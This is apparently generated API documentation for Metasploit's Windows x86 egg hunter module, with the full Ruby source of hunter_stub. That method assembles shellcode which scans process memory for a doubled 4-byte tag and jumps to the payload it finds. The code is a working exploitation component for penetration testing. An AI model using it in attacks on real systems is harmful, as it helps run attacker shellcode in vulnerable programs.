Module: Rex::Exploitation::Egghunter::Windows::X86
- Defined in:
- lib/rex/exploitation/egghunter.rb
Constant Summary
- Alias =
ARCH_X86
Instance Method Summary
-
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for win/x86.
Instance Method Details
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for win/x86.
# The egg hunter stub for win/x86.
#
# Emits a small x86 routine that walks memory a page at a time, probing each
# page with the int 0x2e syscall (number 0x02, see the inline comment) so the
# hunter never faults on unmapped memory, and then looks for the 4-byte egg
# tag stored twice back-to-back. Once both copies match (and the optional
# checksum stub, if emitted by +checksum_stub+, is satisfied) it jumps to EDI,
# which at that point sits just past the second copy of the tag.
#
# @param payload  [String] the payload the hunter is meant to find; only used
#   here as input to +checksum_stub+
# @param badchars [String] bytes to avoid; forwarded to +checksum_stub+ only,
#   this method does not badchar-encode the hunter itself
# @param opts     [Hash]
#   :eggtag   - the 4-byte egg marker (required)
#   :startreg - name of the register holding the address to start scanning
#               from (optional; when omitted the scan starts from whatever
#               EDX happens to hold)
# @return [String] the assembled stub bytes
# @raise [RuntimeError] when :eggtag is not exactly 4 bytes long
def hunter_stub(payload, badchars = '', opts = {})
  # scasd compares a single DWORD, so the tag must be exactly 4 bytes.
  # NOTE(review): a missing :eggtag surfaces as NoMethodError on nil rather
  # than RuntimeError, and `esize` in the message is not defined in this
  # method -- presumably provided by the including class; confirm.
  raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4

  # Encode the tag as a little-endian immediate so `mov eax,<marker>` puts the
  # same four bytes in EAX that scasd will compare against memory.
  tag_marker = format('0x%x', opts[:eggtag].unpack('V').first)
  checksum_asm = checksum_stub(payload, badchars, opts)

  # Optional prologue seeding EDX from a caller-chosen register. The register
  # name is spliced verbatim into the assembly text, so it has to come from
  # the exploit author's own configuration, never from external input.
  start_reg = opts[:startreg]
  prologue =
    case
    when !start_reg then ''
    when start_reg.downcase == 'edx' then "\n\tjmp next_addr\n\t"
    else "\n\tmov edx,#{start_reg}\n\tjmp next_addr\n\t"
    end

  assembly = <<EOS
#{prologue}
check_readable:
  or dx,0xfff
next_addr:
  inc edx
  push edx
  push 0x02 ; use NtAccessCheckAndAuditAlarm syscall
  pop eax
  int 0x2e
  cmp al,5
  pop edx
  je check_readable
check_for_tag:
  ; check that the tag matches once
  mov eax,#{tag_marker}
  mov edi,edx
  scasd
  jne next_addr
  ; it must match a second time too
  scasd
  jne next_addr
  ; check the checksum if the feature is enabled
#{checksum_asm}
  ; jump to the payload
  jmp edi
EOS

  # Assemble and hand back the raw stub bytes.
  Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
end